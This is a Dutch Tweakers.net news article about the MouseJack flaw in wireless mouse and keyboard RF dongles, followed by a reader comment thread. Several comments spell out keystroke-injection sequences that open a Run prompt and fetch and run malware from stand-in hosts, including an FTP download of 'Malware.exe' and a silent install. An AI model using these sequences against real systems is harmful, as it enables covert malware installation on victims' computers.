Veel rf-dongels muizen en toetsenborden vatbaar voor misbruik

Het blijkt eenvoudig om rf-dongels voor draadloze toetsenborden en muizen om de tuin te leiden: een aanvaller kan ze toetsaanslagen laten accepteren en zo malware een systeem binnensmokkelen. De dongels van veel fabrikanten zijn kwetsbaar.

De aanval kan met een usb-dongel van 15 dollar worden uitgevoerd en werkt tot op een afstand van 100 meter, constateerde Bastille Networks, die de kwetsbaarheid beschrijft en hem MouseJack genoemd heeft. Dongels van invoerapparatuur van onder andere Logitech, Dell, HP, Lenovo en Microsoft zijn kwetsbaar. Bij Logitech gaat het om de Unifying Receiver in combinatie met de K360, K400r, K750 en K830. Logitech heeft een softwareupdate uitgebracht om het probleem te verhelpen.

Dat probleem schuilt in het feit dat de rf-packets van de draadloze toetsenborden weliswaar zijn versleuteld, maar die voor muiskliks en -bewegingen niet. Aangezien er geen authenticatiemethode is, kan een dongel dus geen onderscheid maken tussen de kliks van de gebruiker en die van de aanvaller. Bastille heeft nu een bug gevonden in de manier waarop de dongels de ontvangen pakketjes verwerken. Via de kwetsbaarheid is het mogelijk 'muis-packets' zo aan te passen dat ze toetsaanslagen genereren. De ontvangende dongel van een doelwit accepteert de packets en de aanvaller kan zo op deze manier code zoals malware het systeem binnenhalen en uitvoeren, om het systeem bijvoorbeeld over te nemen.

Crazyradio PADe beveiligingsonderzoekers maakten gebruik van de Crazyradio PA, een rf-dongle met een nRF24L-tranceiver en antenne voor werking op lange afstand. De firmware hiervan bleek eenvoudig aan te passen met enkele regels Python voor packetsniffing- en codeinjectie-functionaliteit. Via fuzzing konden de pakketjes van en naar dongels geanalyseerd worden.

De meeste bleken vatbaar voor muis-spoofing en dus voor injectie van toetsaanslagen, maar sommige dongels bleken ook onversleutelde keyboardpackets te accepteren. Daarnaast bleek de kortdurende pairingmode die sommige dongels bieden soms omzeild te kunnen worden, waarna een aanvaller zijn toetsenbord zonder verdere interactie van de gebruiker kan pairen.

Bij ongeveer de helft van de geteste onderdelen is updaten van de accessoires om de kwetsbaarheid te verhelpen niet mogelijk, claimt Bastille. Gebruikers wordt aangeraden die dongels niet meer te gebruiken en over te stappen op bluetooth-varianten of invoerapparatuur met draad. Het beveiligingsbedrijf heeft een lijst van onderzochte onderdelen vrijgegeven en de broncode van zijn tools op Github gepubliceerd zodat gebruikers zelf kunnen controleren welke dongels met muizen en toetsenborden nog meer kwetsbaar zijn.

Helaas!
De video die je probeert te bekijken is niet langer beschikbaar op Tweakers.net.

Door Olaf van Miltenburg

Nieuwscoördinator

25-02-2016 • 16:36

98 Linkedin

Submitter: MR_VIPER

Reacties (98)

98
93
42
1
0
33
Wijzig sortering
Één oplossing: Bluetooth.

Serieus, waarom werkt dat spul nog steeds op klassieke RF, terwijl we een degelijke standaard hebben voor draadloze peripherals?! Er mag nog steeds een dongel bij zitten, maar laat dat dan een BT-dongel zijn. Hoeven de fabrikanten niet steeds een nieuw vierkant wiel uit te vinden.
Sommige RF oplossingen zoals die van microsoft voor de xbox one controller kunnen een lagere latency bieden dan bluetooth. Dat vind ik een goede reden.
Bluetooth 4.0 Low Energy heeft een latency van < 10 ms. Ik geloof niet dat Microsoft daar ver onder kan zitten.
(ze noemen zelf 3 ms: https://www.bluetooth.org...oadDoc.ashx?doc_id=227336)
Ik weet het niet zeker maar ik meen dat bluetooth inherent met een buffer werkt. Ik denk dat de verversingssnelheid van die buffer voor een hogere "latency" zorgt. Muizen en controllers hoeven maar weinig data te verzenden maar die data moet wel het liefst meteen gelezen worden. Als er een buffer is die dat te traag doet creeer je een soort van latency
Daarnaast is de latency van het draadloos verzenden niet het enige wat vertraging geeft. Computers en hun bussen, geheugen etc zijn nu bijvoorbeeld stukken sneller dan 15, 20 jaar geleden maar een (bedraad) Wacom tablet of USB muis heeft nog steeds een zichtbare lag, vooral bij snellere bewegingen. Dit valt vaak niet zo op en is voor de meesten ook niet zo boeiend, maar bijvoorbeeld bij een Cintiq (Wacom met ingebouwd LCD-scherm) zie je je cursor en je penpunt naadt elkaar en dan valt het veel meer op.
Ik heb al een tijd een Bluetooth muis en merk niets van enige vertraging. Nu speel ik geen games, maar het is wat mij betreft een prima verbinding voor de doorsnee muis. Het is gewoon vervelend met de trend van tegenwoordig van steeds minder poorten dat er een poort in gebruik genomen wordt door zo'n RF dongle.
Mijn BT laptop-muis heb ik een aantal vakanties zonder batterijen vervangen kunnen gebruiken, zeg 2 uurtjes per dag. Accuduur (batterijduur in mijn geval) is dus meer dan prima, en hoeft ook niet slechter te zijn dan met een dom RF-signaal.
Waarom zijn alle BT oplossing zo duur! Tevens vind ik persoonlijk BT te traag de keyboards die ik ken kunnen de keystrokes soms niet bij houden erg irritant ze komen wel maar komen soms met een pauze en dan met 7 tegelijk. Waar maakt men zich eigenlijk druk over het aantal draadloze keyboards op rf is erg beperkt. En de mensen die dit kunnen hacken nog veel beperkter. Ik lig hier dan ook snachts niet wakker van.
Netjes van Logitech om snel een firmware update uit te brengen. Ik heb deze zojuist geinstalleerd, wat makkelijk en snel ging.
Die linkt praat over firmware versie nummers die in beide gevallen niet overeen komen met de k360 toetsenbord hier in gebruik, dus kan niets updaten hier.
To check the firmware version on your Unifying receiver, go to Unifying Software → Advanced, and then select the Unifying Receiver.
Standaard staat waarschijnlijk je toetsenbord geselecteerd. De instructies heel nauwkeurig volgen en alles zou goed moeten gaan.
Die linkt praat over firmware versie nummers die in beide gevallen niet overeen komen met de k360 toetsenbord hier in gebruik,
Het gaat niet om het toetsenbord, maar om de firmware van de receiver. Zie de top van de device tree ('Unifying Receiver').

[Reactie gewijzigd door The Zep Man op 25 februari 2016 18:07]

Zoals The Zep Man al aangeeft gaat het inderdaad om de firmware van de unifying receiver en niet om de firmware van de k360 toestenbord. Ikzelf zat eerst ook niet goed te kijken en keek naar de firmware van mijn MX Anywhere 2.

edit. typfoutje

[Reactie gewijzigd door maxxie85 op 25 februari 2016 18:17]

Ha, dank u! Ik zat al de hele dag te wachten op dit bericht, want ik had het vanmorgen al op nu.nl gelezen.

Via de Logitech site de laatste software gedownload, maar die was uit 2010 en de 'Update Firmware' button was greyed out. En firmware updates kon ik niet vinden op de Logitech site. Maa nu dus wel. En je moet de firmware dus eerst runnen. Nu dus gelukt. :)
Hopelijk brengen de andere fabrikanten ook een software update uit.
dit was al in 2011 bekend.Niet echt netjes van logitech om nu pas met een update te komen
Ik heb een Trust :') en je weet wat ze daarvan zeggen :P.
don't trust a trust ...
Ik vind het niet zo netjes dat deze firmware update alleen via een windows-systeem geïnstalleerd kan worden. Moet ik daar eerst weer aan zien te komen... Gelukkig heeft mijn vriendin zo'n ding, inclusief kwetsbare microsoft dongle. Hoog tijd dat ik mijn NRF24 dongles eens ga testen dus, voordat ik update. :).
Dual boot. Windows 10 en activeer hem niet. Tuurlijk jammer dat het niet gewoon onder linux gaat. Maar hij is nog steeds beter als niets
Moest windows nu eens een optie hebben om te dualbooten dan zou dat een goede oplossing zijn.

Anderzijds zou het niet mogelijk zijn om de usb dongle te koppelen aan een virtuele windows?
? je kan windows toch prima naast Linux draaien?
https://www.youtube.com/watch?v=vxepmtjmilQ

Zou denk ik ook wel moeten lukken.
Ik draai momenteel gentoo. Probeer eens windows te installeren naast gentoo zonder de bootloader te breken. Dit soort dingen horen gewoon beschikbaar te zijn voor windows, mac en linux. logitech zegt trouwens wel compatibel te zijn met linux op te verpakking.
mjah, ik draai ubuntu (mate) naast windows ...
geen probleem hier hoor ... allebei booten ze met EFI en de bootloader (grub) handelt dat allemaal perfect af (zelf ook efi uiteraard)

het is dus uiteraard wel zaak dat je eerst windows installeert en daarna je linux; tenzij je weet hoe je de bootloader achteraf terug kan zetten naar grub; dit heb ik gedaan na upgrade naar win10; gewoon met een usb stick de bootloader terug zetten...
de windows bootloader ondersteunt enkel windows, dus die moet je sowieso niet gebruiken bij multiboot
Daar zit hen het probleem ik draai helemaal geen windows. Eventjes heel de bootloader breken voor een OS dat je niet gebruikt is wat teveel van het goede. Bootloader terugzetten is opzich het probleem niet (gentoo heeft daar een mooie handbook voor). Maar om nu een heel nieuw os te installeren, bootloader repareren en dan achteraf alles weer wegdoen. Dat is gewoon teveel werk en zeker omdat logitech adverteert met linux compabiliteit.
je zal toch wel iemand kennen dan die je effe wil helpen met z'n windows machine?

en wat dacht je anders van effe de demo te installeren van win10 in een VM?
Dat is erg logisch omdat windows 10 hun eigen bootloader op de bootsection zetten van de schijf, over grub.
ik draai xubuntu naast windows 10, die kan je instellen dat ie de optie van linux laat zien bij het booten. dat werkt ook gewoon :P
laat windows xubuntu (en dus potentieel ook andere debian/ubuntu distro's) zien in zijn bootloader?
je moet zelf de entry aanmaken maar je kan gewoon in de windows bootloader linux laten booten.
dat wist ik dus niet...ik ging er altidj van uit dat dit niet zou werken omdat het vroeger ook nooit werkte, ik dacht dan ook altijd dat het filesysteem hier voor iets tussen zou zitten (windows leest geen ext-filesystemen uit dus de .EFI file kan hij niet zien) maar blijkbaar zit de vork toch anders in de steel...
nou ja, grub zelf zit altijd in een fat systeem. dus dat kan het zijn :P
Ik heb deze zojuist geinstalleerd, wat makkelijk en snel ging.
Dat is mooi om te horen. Hoe doe ik dit onder Linux?
Ik heb Windows geboot, de firmware bijgewerkt en daarna weer terug gegaan naar Linux Mint, muis werkt nog prima. Als je zelf geen Windows installatie meer hebt, dan kan je vast de computer van iemand anders gebruiken. Misschien werkt het ook met Wine, maar voor de zekerheid heb ik het maar in Windows gedaan.
In Wine die unifying software van Logitech installeren en werkend krijgen lijkt me wat veel moeite. Ik gok dat ik de receiver maar ergens in een Windows pc moet pluggen. Overigens heb ik 3 van die dingen, dus ik ben even bezig gok ik.
Ik heb zo'n Microsoft Sculpt muis. Zouden fabrikanten verplicht kunnen worden zo'n muis terug te nemen als ze zelf niet te updaten zijn?
Mijn sculpt muis van microsoft heeft bluetooth welke volgens dit bericht niet vatbaar is.
De Sculpt muis ergonomic heeft 3 jaar beperkte fabrieksgarantie:
http://download.microsoft...5C/Limited%20Warranty.pdf (pag. 12)
Hier staat in dat schade door verlies van data of privacy in ieder geval niet vergoed wordt.
Of de bug zelf onder de garantie valt is dus nog maar zeer de vraag.
Op eventuele defecten die worden ontdekt
na het verstrijken van de Garantieperiode is geen enkele garantie of voorwaarde van toepassing.
Dus je kan het proberen, en als genoeg mensen klagen zullen ze wel met een update komen.
In principe vind ik wel dat fabrikanten hun producten zodanig moeten ontwerpen dat eventuele veiligheidsproblemen opgelost kunnen worden; bijvoorbeeld de stagefrightbug die op ietwat verouderde telefoons niet word verholpen vind ik oneerlijk.

In dit geval is het vaak niet praktisch om een aanval te doen en je kunt het ook op tijd doorhebben en de dongle loskopopelen. Sommige toetsenborden zijn misschien af te luisteren, maar ook daar vraag ik me af of het wel de schuld van de fabrikant is. Sowieso vind ik het niet slim om gevoelige info zomaar draadloos te versturen.

Je mag natuurlijk wel verwachten dat een fabrikant zijn best doet om de apparatuur te beveiligen, maar je moet ook wel bedenken dat een toetsenbord of muis niet is up te daten. Toetsenborden en muizen zijn relatief goedkoop dus voor die prijs hoef je vaak ook niet te verwachten dat de fabrikant garandeerd dat ze onkraakbare encryptie toepassen.
Ik snap wat je bedoeld, het gaat hier 'maar' om een muis en keyboard. Maar het probleem is dat ze op sommige onderdelen geen encryptie toepassen. Mijn Microsoft muis en keyboard waren niet goedkoop, dan hoop ik toch een beetje dat de communicatie fatsoenlijk in elkaar steekt. Juist omdat je bij de standaard Windows en OSX installatie precies weet welke keystrokes je nodig hebt om mogelijk schadelijke commando's uit te voeren. Je weet dat je er op kon wachten tot iemand de communicatie ging sniffen.
Je weet dat je er op kon wachten tot iemand de communicatie ging sniffen.
Precies, en daarom zit ik bekabeld.
Haha, touche.
Kent iemand een bekabeld alternatief voor de Microsoft sculpt keyboard en muis?
Als een boef jouw muis afluistert dan ziet hij alleen dat je naar links, rechts boven onder muist en af en toe scrolt.
Heb je het artikel wel gelezen?
Via de kwetsbaarheid is het mogelijk 'muis-packets' zo aan te passen dat ze toetsaanslagen genereren
This research was done in 2011 by travis goodspeed : http://travisgoodspeed.bl...ty-is-nrf24l01s-duty.html
Dat staat toch in het gelinkte artikel gewoon genoemd in de voetnoten? Oftewel, ere wie ere toekomt; ik begrijp niet precies waarom het apart in deze comments moet?
Toch vreemd dat Logitech (en de andere tech companies) niet eerder actie hebben ondernomen, als het blijkbaar al zolang bekend is.
dat is om aan te geven dat het niet nieuwswaardig is. Of komt er morgen een artikel dat iemand Windows XP gehackt heeft?
waarom ze niet gewoon naar pairing gaan is mij al jaren onduidelijk....
Anoniem: 135018
25 februari 2016 16:55
Thuis heb ik lekker alles met draad. Enig de raspberry pi(open elec) werkt met wireless keyboard van rapoo.


Zou je met zo'n dongel een universele reciver kunnen programeren? Lekker luisteren naar keystrokes van de buren.
Je hebt dan niet alles met draad :P

En nee, het gaat hier vooralsnog om de ontvanger om de tuin te leiden zodat hij een muis-actie als een toetsaanslag ziet. Al zal het onderscheppen van keystrokes op zich ook wel niet zo geweldig moeilijk zijn... toch?
Is er eigenlijk een verschil tussen de K400 en de K400r? Ik wist namelijk niet van het bestaan van een -r versie. Voor de zekerheid toch maar de update gedaan, binnen 5 minuten gelukt en daarna netjes de Unifying software verwijderd.
Draadloze keyboards/muizen zijn te hacken? Dat is de afgelopen 10 jaar niet veranderd dus.
screen recorder instaleren :P kan je trug kijken of/hoe je gehackt bent. of je dan al telaat bent moet je maar bekijken wat je doet
Ik moet eerlijk zeggen dat ik me afvraag wat het nut van deze hack is (los van het feit dat dit oud nieuws is).

Ok, stel dat een hacker naast me zit (want ja mijn Logitech dongle heeft geen bereik verder dan pak hem beet 3 meter). Dan verstuurt hij zo'n pakketje en dan wat.... Ok, ik heb wat irritatie, maar ik kan zonder moeite de fout van zijn ene klik terugzetten. HIj heeft geen controle over de PC heeft geen keylogger of wat dan ook. Hij moet dan wel naar het beeld kijken en dan heel snel doorklikken om wat te zien. Ten eerste valt dat op en ten tweede bij het invullen van bijvoorbeeld een wachtwoord zie je toch alleen maar bolletjes.

Nou is er natuurlijk nog een methode. Net zo als de chip in het artikel kan hij extra ver. Heel mooi, maar dan valt er toch niks te zien en kan alleen een klik worden gemaakt op afstand. Nogmaals, geen controle geen keylogger of ook maar iets wat schade kan aanrichten.

Het enige waarvoor dit leuk is voor een les bij informatica of zoiets. Laten zien wat er kan een beetje de kinderen uitleggen zodat ze wat feeling krijgen. Diezelfde leerling neemt dat mee en voert dat met veel lol uit bij de eerst volgende digibeet van en leraar.

Het zou op zich wel netjes zijn als bedrijven er een update voor geven. Nog niet zo zeer dat het nodig is, maar meer of wat irritatie te voorkomen.
Via toetsencommandos kan je het startmenu openen, naar "Run" gaan en alles uitvoeren wat je maar wilt. Je zou bijvoorbeeld "regedit" kunnen openen om het systeem eens grondig onder handen te nemen (of om meer openingen te creëren). Dat jouw dongle een bereik heeft van 3 meter maakt daarbij niet uit: als het commando verzonden wordt vanaf 100m zou dat alsnog opgepakt kunnen worden door de dongle (alleen ontvangen, ik neem aan dat niet elke toetsaanslag bevestigd wordt).
Ok, je tweede punt staat letterlijk beschreven in mijn stukje. Dus dat kan je weglaten.

De grote grap is dat je geen bevestiging krijgt van (!!) het OS. Dus je kan bevestiging krijgen van de toets is aangekomen, maar niet van het OS zelf. De PC kan in lock staan, misschien vraagt hij om een wachtwoord bij het uitvoeren van "CMD" of "Run". Misschien hebben we het helemaal niet over een Windows PC. Dit kan je alleen bevestigingen als je ernaast zit over er ook nog een CCTV hebt bestaan (tegen die tijd, gebruikt een hacker wel een keylogger ofzo).

Maar goed het is nog steeds leuk om je collega te irriteren of zoiets :)
[ctrl] + [alt] met [cursor down] werkt dan beter hoor. ....
het hoeft ook niet altijd te werken...
als het op zeg 1 van de 500 pc's op het netwerk lukt dan heb je al success,
elk systeem is zo sterk als de zwakste schakel, en gewoon lompweg 500X een commando uitsturen kost niets, en op een gegeven moment is er vast iemand weg van zijn bureau maar nog niet uitgelogd, en kassa je hebt een beveiligde VPN naar zijn pc of zoiets.

verder wat ook interesasnt is is als je een PC geinfecteerd hebt, om deze pc dan weer commandos te laten versturen via deze modules naar andere pc's en daarmee elke beveiliging te omzeilen, en dus wel steeds verder te verspreiden

[Reactie gewijzigd door freaq op 25 februari 2016 19:28]

Anoniem: 463321
@RL60025 februari 2016 17:38
De hacker kan simpelweg een lading toetsenbord commando's afvuren en daarmee al genoeg doen. Beeld is niet nodig.
En dan wat? Mijn presentatie van morgen afschrijven? Lorem ipsum sturen? Wow, goede hack hoor zeer effectief en destructief!
win+r, iexplore http://someexe, run it. Beetje creatiever nadenken voortaan. Bleh, een comment lager lezen :+

[Reactie gewijzigd door analog_ op 25 februari 2016 18:15]

Ctrl-alt-del
of: beter nog:
windows+R (run)
CMD [enter]
FTP ftp.slechteserver.ru
user: anonymous
email@dress
GET Malware.exe
quit
start malware.exe /silentinstall /force /boot=yes
genoeg?
Aanname 1: het is een windows PC
Aanname 2: De PC is ingelogd
Aanname 3: Alle commanda's zijn goed aangekomen in die volgorde
Aanname 4: Nergens wordt er om een wachtwoord van de windows PC gevraagd wat het hele proces te niet doet
Aanname 5: Er is geen Antivirus geinstalleerd
Aanname 6: Gebruiker is achterlijk en als hij achter zijn PC zit laat het toe dat zonder enige rede een CMD wordt geopend en iets van een FTP gaat laden.

Genoeg?
Het is een hack wat niets kosten en maar wel iets kan opleveren. Dus ben jij niet vatbaar dan bestaat de kans dat ze je. Buurman pakken. En 90% van de mensen wil geen meldingen ontvangen over installeer x/y. En al helemaal geen wachtwoord invoeren.
Aanname 1: laatste keer dat ik keek was op linux mint de win-key+r bijna equivalent met de windows versie ervan... mogelijks ondertussen nietmeer?.
een exe EN een .Sh downloaden is peanuts, en een van beiden zal allicht werken.
Aanname 2: correct. een situatie waarin 90% van de pc's die aanstaan zich bevinden.
Aanname 3: commando's die je sequentieel ingeeft (letter per letter) komen meestal ook sequentieel aan. indien niet heeft de echte gebruiker zijn apparatuur allang door het ram gekieperd
Aanname 4: correct. zie ook aanname 2 (spotify staat open of zo)
Aanname 5: niet alle pc's hebben een werkende virusscanner. ik wil niet weten hoeveel mensen hun pc kopen met bijvoorbeeld 3 maanden norton, en dat abo niet verlengen. Trouwens: lang niet alle malware is dusdanig herkend door virussen
Aanname 6: gebruikers zitten niet steeds aan hun pc: spotify, even naar toilet, etc... En zelfs als ze eraan zitten: als ze enkel aan het lezen zijn kan het scherm wel even voor hun heen flitsen, maar is het weg voor ze het goed en wel beseffen...
Je bent aanname 7 vergeten: user werkt met een admin-account, doch .. moet k die echt ontkrachten?

Besef even hoe lomp een gemiddelde gebruiker is, en besef dan dat statistisch de helft van de medemensen nog dommer zijn...
Wat dacht je van, een command prompt starten en een virus inladen via een http request? UAC helpt je ook niet. Want je kan het toetsenbord nu eenmaal bedienen...
Je hebt er niks aan het toetsenbord te kunnen bedienen als je het admin password niet kent. UAC helpt dan dus wel degelijk!
Correct, maar ik ken maar heel weinig mensen die een los account hebben zonder admin rechten. Doorgaans is UAC dus alleen maar een Ja/Nee (Yes/No) prompt.

Maar in principe heb je gelijk.
[winkey-r]iexplore www.yourmalwarehere.com
Zo makkelijk is het om iemand bijvoorbeeld naar een website te sturen waar de PC dan verder geïnfecteerd wordt. Bovendien heeft die dongle standaard dan misschien niet zo'n groot bereik (hoewel 3 meter naar mijn idee nogal laag geschat is, de mijne komt een stuk verder), maar als je aan de andere kant een veel betere antenne plaatst dan kom je een heel eind. Volgens mij doet mijn keyboard het nog wel van buiten voor het raam, met een wat betere antenne lukt het denk ik ook nog wel vanuit een auto of vanaf de buren.
Als ik remote kan typen en muizen op jouw machine, denk je dan niet dat ik daar prima een keylogger of wat voor andere rommel ik maar wil kan installeren? Remote access open zetten?

Op dit item kan niet meer gereageerd worden.

Tweakers maakt gebruik van cookies

Tweakers plaatst functionele en analytische cookies voor het functioneren van de website en het verbeteren van de website-ervaring. Deze cookies zijn noodzakelijk. Om op Tweakers relevantere advertenties te tonen en om ingesloten content van derden te tonen (bijvoorbeeld video's), vragen we je toestemming. Via ingesloten content kunnen derde partijen diensten leveren en verbeteren, bezoekersstatistieken bijhouden, gepersonaliseerde content tonen, gerichte advertenties tonen en gebruikersprofielen opbouwen. Hiervoor worden apparaatgegevens, IP-adres, geolocatie en surfgedrag vastgelegd.

Meer informatie vind je in ons cookiebeleid.

Sluiten

Toestemming beheren

Hieronder kun je per doeleinde of partij toestemming geven of intrekken. Meer informatie vind je in ons cookiebeleid.

Functioneel en analytisch

Deze cookies zijn noodzakelijk voor het functioneren van de website en het verbeteren van de website-ervaring. Klik op het informatie-icoon voor meer informatie. Meer details

janee

    Relevantere advertenties

    Dit beperkt het aantal keer dat dezelfde advertentie getoond wordt (frequency capping) en maakt het mogelijk om binnen Tweakers contextuele advertenties te tonen op basis van pagina's die je hebt bezocht. Meer details

    Tweakers genereert een willekeurige unieke code als identifier. Deze data wordt niet gedeeld met adverteerders of andere derde partijen en je kunt niet buiten Tweakers gevolgd worden. Indien je bent ingelogd, wordt deze identifier gekoppeld aan je account. Indien je niet bent ingelogd, wordt deze identifier gekoppeld aan je sessie die maximaal 4 maanden actief blijft. Je kunt deze toestemming te allen tijde intrekken.

    Ingesloten content van derden

    Deze cookies kunnen door derde partijen geplaatst worden via ingesloten content. Klik op het informatie-icoon voor meer informatie over de verwerkingsdoeleinden. Meer details

    janee